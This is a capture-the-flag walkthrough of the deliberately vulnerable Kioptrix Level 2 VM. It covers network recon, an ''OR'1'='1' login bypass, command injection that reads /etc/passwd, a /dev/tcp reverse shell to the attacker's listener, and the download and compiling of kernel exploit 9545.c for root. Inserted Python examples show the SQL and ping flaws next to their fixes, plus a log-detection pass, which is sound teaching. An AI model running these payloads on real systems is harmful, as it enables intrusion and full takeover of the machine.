Wednesday, February 20, 2019

Kioptrix_level2

netdiscover -f -r 192.168.0.0/24

nmap -sS -T4 -A 192.168.0.9

nikto -host 192.168.0.9 -port 80 -output nikto.html

SQL injection

Log in with the username admin and the password 'OR'1'='1
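
The mechanism behind that login bypass, as an added example that is not code from the original post or from the Kioptrix VM: a query built by string concatenation next to the same check with bound parameters. It assumes a hypothetical users table with one constructed row; the VM's real schema and PHP code are not on the page.

```python
"""Added example (not from the original post): the login check behind
the 'OR'1'='1 bypass, shown as a string-built query next to a
parameterised one. The users table and the admin row are constructed
for this example; the VM's real schema and code are not on the page."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'not-the-real-password')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String concatenation: the password field is parsed as SQL syntax."""
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    # With the password 'OR'1'='1 the WHERE clause becomes
    #   username = 'admin' AND password = '' OR '1'='1'
    # AND binds tighter than OR, so '1'='1' makes every row match.
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the input is data and can never change the query."""
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    db = make_db()
    payload = "'OR'1'='1"
    print("string-built query:", login_vulnerable(db, "admin", payload))  # True
    print("parameterised query:", login_safe(db, "admin", payload))       # False
```

The fix is the parameterised form alone; escaping quotes by hand is the wrong lesson to take from this page, because the bypass relies on the database parsing user input as syntax, and bound parameters remove that possibility entirely.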

ping 127.0.0.1;cat /etc/passwd

;uname -ar
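
The ping input above lets a ';' terminate the ping command and run whatever follows as the web server user. As an added example, not code from the original post or from the VM, here is that flawed pattern next to a hardened handler in Python. It assumes the application builds a shell command line from the submitted host, which is what the ';cat /etc/passwd' payload implies; the VM's real source is not on the page.

```python
"""Added example (not from the original post): the ping form's
command-injection flaw and a hardened handler. Assumes the web app
pastes the submitted host into a shell command line; the real source
of the vulnerable VM is not on the page."""
import ipaddress
import subprocess


def build_vulnerable_command(host: str) -> str:
    """The flawed pattern: user input pasted into a shell command line.
    Handed to a shell, a ';' in host ends ping and starts a second command."""
    return "ping -c 3 " + host


def validate_host(host: str) -> str:
    """Accept only a literal IPv4 or IPv6 address and return it normalised.
    Raises ValueError for shell metacharacters, hostnames or empty input."""
    return str(ipaddress.ip_address(host.strip()))


def is_valid_host(host: str) -> bool:
    """Boolean form of validate_host for callers that only need a verdict."""
    try:
        validate_host(host)
        return True
    except ValueError:
        return False


def build_safe_argv(host: str) -> list:
    """Return an argv list with the validated address as a single argument.
    Run without shell=True, no character in it is ever interpreted by a shell."""
    return ["ping", "-c", "3", validate_host(host)]


def run_ping(host: str) -> int:
    """Run ping with an argv list and no shell; return its exit status."""
    return subprocess.run(build_safe_argv(host), capture_output=True).returncode


if __name__ == "__main__":
    attempt = "127.0.0.1;cat /etc/passwd"
    print("shell line a vulnerable app would run:", build_vulnerable_command(attempt))
    print("accepted by the validator:", is_valid_host(attempt))   # False
    print("argv for a clean input:", build_safe_argv("127.0.0.1"))
```

Two layers are at work: the allow-list validator rejects anything that is not an address, and the argv list removes the shell from the path entirely, so even a validator bug could not turn input into a second command. Logging rejected inputs is also a cheap detection signal, since legitimate users rarely submit semicolons in an address field.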

On Kali Linux, run: nc -nlvp 443

On Kioptrix, enter: ; bash -i >& /dev/tcp/172.16.209.129/443 0>&1

You will get shell access on the Kali listener.

Run whoami

It will show apache

Now go back to the Kali shell.

cat /etc/*-release will show the OS release is 4.5
 
Run searchsploit -w linux kernel CentOS
9545.c is the one for privilege escalation

python -m SimpleHTTPServer 80

wget http://kalilinuxIP/9545.c

Once the file has downloaded:

gcc -o priv 9545.c

chmod 755 priv

./priv

whoami; you will see root
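
Seen from the defender's side, every step from the reverse shell to the compiled exploit is a process started by the apache account that a web server has no business starting. As an added example, not code from the original post, here is a small detection pass in Python over process-start records. The record format and the sample lines are constructed for this example from the commands above; they are not the VM's real logs.

```python
"""Added example (not from the original post): a detection pass over
constructed process-start records covering the post-exploitation steps
the walkthrough lists (the apache user starting an interactive shell
with a /dev/tcp redirect, then fetching and compiling a kernel exploit).
The record format and sample lines are constructed; they are not the
VM's real logs."""
import re

# Accounts a web server runs under; none of them should spawn shells or compilers.
WEB_USERS = {"apache", "www-data", "nginx"}
SHELLS = {"bash", "sh", "dash", "zsh"}
TOOLING = {"wget", "curl", "gcc", "cc"}

# Constructed records in the form "user=<account> cmd=<command line>".
SAMPLE_EVENTS = [
    "user=apache cmd=ping -c 3 127.0.0.1",
    "user=apache cmd=bash -i >& /dev/tcp/172.16.209.129/443 0>&1",
    "user=apache cmd=wget http://kalilinuxIP/9545.c",
    "user=apache cmd=gcc -o priv 9545.c",
    "user=root cmd=/usr/sbin/logrotate /etc/logrotate.conf",
]

LINE_RE = re.compile(r"user=(\S+) cmd=(.*)")


def classify(event: str) -> list:
    """Return the detection labels that fire for one record (empty if clean)."""
    m = LINE_RE.match(event)
    if not m:
        return ["unparsed"]
    user, cmd = m.groups()
    parts = cmd.split()
    # Program name without its directory, so /bin/bash and bash compare equal.
    argv0 = parts[0].rsplit("/", 1)[-1] if parts else ""
    findings = []
    if user in WEB_USERS and argv0 in SHELLS and "-i" in parts[1:]:
        findings.append("web-user-interactive-shell")
    if "/dev/tcp/" in cmd:
        findings.append("dev-tcp-redirect")
    if user in WEB_USERS and argv0 in TOOLING:
        findings.append("web-user-tooling")
    return findings


def scan(events) -> dict:
    """Map every suspicious record to its labels; clean records are left out."""
    results = {}
    for event in events:
        labels = classify(event)
        if labels:
            results[event] = labels
    return results


if __name__ == "__main__":
    for event, labels in scan(SAMPLE_EVENTS).items():
        print(", ".join(labels), "<-", event)
```

The ping record stays clean because the rule keys on what the web user launches, not on the form being used, and the root logrotate record shows the rules do not fire on ordinary system activity. The same three rules map directly onto auditd execve records or EDR process telemetry; only the parser changes.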

cat .bash_history

Netdiscover

netdiscover [-i device] [-r range | -p] [-s time] [-n node] [-c count] [-f] [-S]

-i device -- The network interface to sniff and inject packets on. If no interface is specified, the first available one will be used.
-r range -- Scan a given range instead of auto-scanning. Valid range values are, for example, 192.168.0.0/24, 192.168.0.0/16 or 192.168.0.0/8.
-p -- Enable passive mode. In passive mode, netdiscover does not send anything; it only sniffs.
-s time -- Sleep the given time in milliseconds between each ARP request injection (default 1).
-c count -- Number of times to send each ARP request. Useful on networks with packet loss, since each host will be scanned the given number of times.
-n node -- Last IP octet of the source IP used for scanning. Change it if the default host address is already in use (allowed range: 2 to 253, default 66).
-S -- Enable sleep-time suppression between requests. If set, netdiscover sleeps after having scanned 255 hosts instead of after each one. This mode was used in netdiscover 0.3 beta4 and before. Avoid this option on networks with packet loss or on wireless networks with a low signal level (also called hardcore mode).
-f -- Enable fast-mode scan. This only scans .1, .100 and .254 on each network. This mode is useful while searching for ranges in use; once you have found such a range, run a specific range scan to find the online boxes.